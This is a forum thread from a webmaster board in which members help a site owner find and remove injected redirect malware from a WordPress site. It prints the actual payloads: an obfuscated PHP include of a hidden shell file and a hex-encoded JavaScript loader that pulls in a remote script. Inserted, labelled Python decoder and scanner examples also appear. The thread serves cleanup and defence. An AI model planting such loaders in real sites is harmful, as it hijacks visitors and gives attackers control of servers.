Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

Old 12-14-2011, 01:33 PM   #1
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
Redirection issue

Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com

Last edited by Chezter; 12-14-2011 at 01:34 PM..
Old 12-14-2011, 01:46 PM   #2
Barry-xlovecam
It's 42
Join Date: Jun 2010
Location: Global
Posts: 18,083
This is what I found:
Code:
01:47:03.040	0.376	829	275	GET	302	Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4	http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg==

01:47:03.613	0.193	540	203	GET	302	Redirect to: http://www.cam4.com?act=200116~us-c	http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4
Old 12-14-2011, 01:55 PM   #3
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
Ok thank you, but I still do not know how to figure out what is causing it from this piece of code, but at least I see it is really true
Old 12-14-2011, 01:56 PM   #4
Colmike9
(>^_^)b
Join Date: Dec 2011
Posts: 7,224
If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:

teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js
teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js
Old 12-14-2011, 02:00 PM   #5
MikeFold
Confirmed User
Join Date: Nov 2001
Location: semi-retired
Posts: 465
went to your site via google search
after the page loaded I
got redirected here:

http://17.uso2.com/

edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds)
LOL
__________________
nothing to promote

Last edited by MikeFold; 12-14-2011 at 02:07 PM..
Old 12-14-2011, 02:08 PM   #6
Colmike9
(>^_^)b
Join Date: Dec 2011
Posts: 7,224
Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish


Also, is that last line of js after html tag supposed to be there?..
Old 12-14-2011, 02:29 PM   #7
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...
Old 12-14-2011, 02:35 PM   #8
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
I see some strange piece of code right in the top of header.php so I put it away, is it still redirecting?
Old 12-14-2011, 02:50 PM   #9
Colmike9
(>^_^)b
Join Date: Dec 2011
Posts: 7,224
It doesn't redirect for me anymore so I hope that fixed your problem
Old 12-14-2011, 02:58 PM   #10
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

Code:
<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
Old 12-14-2011, 03:21 PM   #11
Colmike9
(>^_^)b
Join Date: Dec 2011
Posts: 7,224
Quote:
Originally Posted by Chezter View Post
Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

Code:
<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
That's what I was thinking too but wasn't sure if you put it there or not. Are you using the latest version of WP (3.3) and maybe upgrade your php.

And change your passwords

Last edited by Colmike9; 12-14-2011 at 03:22 PM..
Old 12-14-2011, 03:24 PM   #12
ruff
I have a plan B
Join Date: Aug 2004
Location: Seattle - Miami - St Kitts
Posts: 5,501
Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
__________________
CryptoFeeds
Old 12-14-2011, 03:29 PM   #13
anexsia
Confirmed User
Join Date: May 2010
Posts: 5,735
Quote:
Originally Posted by Chezter View Post
Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from happening it again?

Code:
<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>
Whenever you see encoded stuff like that it's usually bad, you can also use a decoder to see what the actual code was. There's a lot of "free" wordpress theme websites that will put stuff like this in the theme. Always go through your header and footer checking for it.
anexsia is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
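What "use a decoder" can look like for the two snippets posted in this thread, as an added example that is not part of any post here: a Python script that decodes the `base64_decode()` argument and the hex string as plain data, without running either snippet. The function names and the `defang` helper are this example's own.

```python
import base64
import binascii
import re

# Sample input: the two injected snippets quoted in this thread, cut down to
# the statements that carry the encoded payload.
PHP_INJECT = "<?php $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?>"
JS_INJECT = """<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>"""

B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
HEX_LITERAL = re.compile(r"[\"']((?:[0-9a-fA-F]{2}){16,})[\"']")
URL = re.compile(r"https?://[^\s'\"<>]+")


def decode_layers(source):
    """Decode base64_decode() arguments and long hex literals as data only.

    Nothing from `source` is executed; undecodable candidates are skipped.
    """
    layers = []
    for match in B64_CALL.finditer(source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue
        layers.append(("base64", raw.decode("utf-8", "replace")))
    for match in HEX_LITERAL.finditer(source):
        layers.append(("hex", bytes.fromhex(match.group(1)).decode("latin-1")))
    return layers


def defang(text):
    """Rewrite URLs so they are not clickable when pasted into a ticket."""
    def _rewrite(match):
        return match.group(0).replace("http", "hxxp", 1).replace(".", "[.]")
    return URL.sub(_rewrite, text)


def report(source):
    """Return (encoding, defanged plaintext) for each decoded layer."""
    return [(kind, defang(plain)) for kind, plain in decode_layers(source)]


if __name__ == "__main__":
    for snippet in (PHP_INJECT, JS_INJECT):
        for kind, plain in report(snippet):
            print(f"{kind}: {plain}")
```

The PHP layer decodes to a file path on the server and the JavaScript layer to a remote `<script>` tag, so the decoded path names a second file that also has to be inspected and removed.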
Old 12-14-2011, 03:39 PM   #14
Colmike9
(>^_^)b
Join Date: Dec 2011
Posts: 7,224
Quote:
Originally Posted by ruff View Post
Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
That's the script under html that I was talking about, thought it was deleted.. My bad

Quote:
Originally Posted by Colmike7 View Post
Also, is that last line of js after html tag supposed to be there?..

Last edited by Colmike9; 12-14-2011 at 03:41 PM..
Old 12-14-2011, 03:53 PM   #15
MediaGuy
Confirmed User
Join Date: Sep 2004
Location: Montrealquebecanada
Posts: 5,500
Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.

I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site.

To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did.

And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out.

When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes.

Oh, and update your version of wordpress.
__________________

YOU Are Industry News!
Press Releases: pr[at]payoutmag.com
Facebook: Payout Magazine! Facebook: MIKEB!
ICQ: 248843947
Skype: Mediaguy1
Old 12-14-2011, 03:54 PM   #16
Barry-xlovecam
It's 42
Join Date: Jun 2010
Location: Global
Posts: 18,083
line 586 index.html

<!-- /wrapper -->



</body>

</html>

<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
Old 12-15-2011, 08:55 AM   #17
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
It is the same code, just it was not only in header but it is in footer, index, links... everywhere

Last edited by Chezter; 12-15-2011 at 09:09 AM..
Old 12-15-2011, 09:29 AM   #18
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
"Funny" is that it is also in other domains on the same ftp account, just everywhere, and it has been there for 11 months, that's crazy. I would like to know how I could never see it on any site...
Chezter is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
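One way to check every file under a document root for the patterns posted in this thread (the marker-wrapped include, the script after `</html>`, the hex string passed to `document.write`, and a PHP file sitting in an image directory), as an added example that is not part of any post here. The function names, the extension list and the sample tree are this example's own; the sample files are constructed and use a placeholder marker value.

```python
import os
import re
import tempfile

# Patterns modelled on the snippets quoted in this thread.
MARKER_WRAP = re.compile(rb"<\?/\*([0-9a-f]{32})\*/\?>(.*?)<\?/\*\1\*/\?>", re.S)
AFTER_HTML = re.compile(rb"</html\s*>\s*<script", re.I)
HEX_WRITER = re.compile(rb"[\"'](?:[0-9a-f]{2}){16,}[\"'].*?unescape.*?document\.write", re.I | re.S)

def scan_file(path):
    """Return the names of the signatures that match one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = []
    wrapped = MARKER_WRAP.search(data)
    if wrapped and b"base64_decode" in wrapped.group(2):
        hits.append("marker-wrapped encoded include")
    if AFTER_HTML.search(data):
        hits.append("script after </html>")
    if HEX_WRITER.search(data):
        hits.append("hex string passed to document.write")
    parent = os.path.basename(os.path.dirname(path)).lower()
    if path.lower().endswith(".php") and parent in ("img", "images"):
        hits.append("PHP file in image directory")
    return hits

def scan_tree(root):
    findings = {}  # relative path -> matched signatures
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if name.lower().endswith((".php", ".html", ".htm", ".js")) and (hits := scan_file(full)):
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings

def make_sample_tree():
    """Constructed docroot: three flagged files and one clean one."""
    root = tempfile.mkdtemp()
    tag = b"<?/*" + b"0" * 32 + b"*/?>"  # placeholder marker value
    files = {
        "theme/header.php": tag + b"<?php $p = base64_decode('QQ=='); @include_once $p;?>" + tag,
        "index.html": b"<html></html>\n<script>var x='" + b"41" * 20 + b"';y+=unescape('%'+x);document.write(y);</script>",
        "theme/img/sh.php": b"<?php /* placeholder */ ?>",
        "page.php": b"<?php echo 'hello'; ?>",
    }
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return root
```

Running `scan_tree` again after a cleanup shows whether any flagged file is left, on every domain under the same account.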
Old 12-15-2011, 01:13 PM   #19
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.
Old 12-15-2011, 01:42 PM   #20
MikeFold
Confirmed User
Join Date: Nov 2001
Location: semi-retired
Posts: 465
Quote:
Originally Posted by Chezter View Post
Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites is still redirecting or not. Thanks again all of you who helped me with this.
ok...tried it for you again (different box and browser)
it tried to hijack my browser.....i viewed source and this was still at the bottom

Code:
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script>
__________________
nothing to promote
Old 12-15-2011, 01:46 PM   #21
Barry-xlovecam
It's 42
Join Date: Jun 2010
Location: Global
Posts: 18,083
check the version of your FTP program -- is it up to date?
there was a problem like this a while back with old Filezilla apps -- maybe related
Old 12-15-2011, 03:23 PM   #22
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
I use total commander 7.04 and it is probably not up to date
Old 12-15-2011, 04:23 PM   #23
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it is still there then I'm really fucked....
Old 12-17-2011, 08:45 AM   #24
Chezter
Confirmed User
Join Date: Apr 2008
Location: Brno, Czech rep.
Posts: 565
I know I'm annoying, but is it still redirecting or not?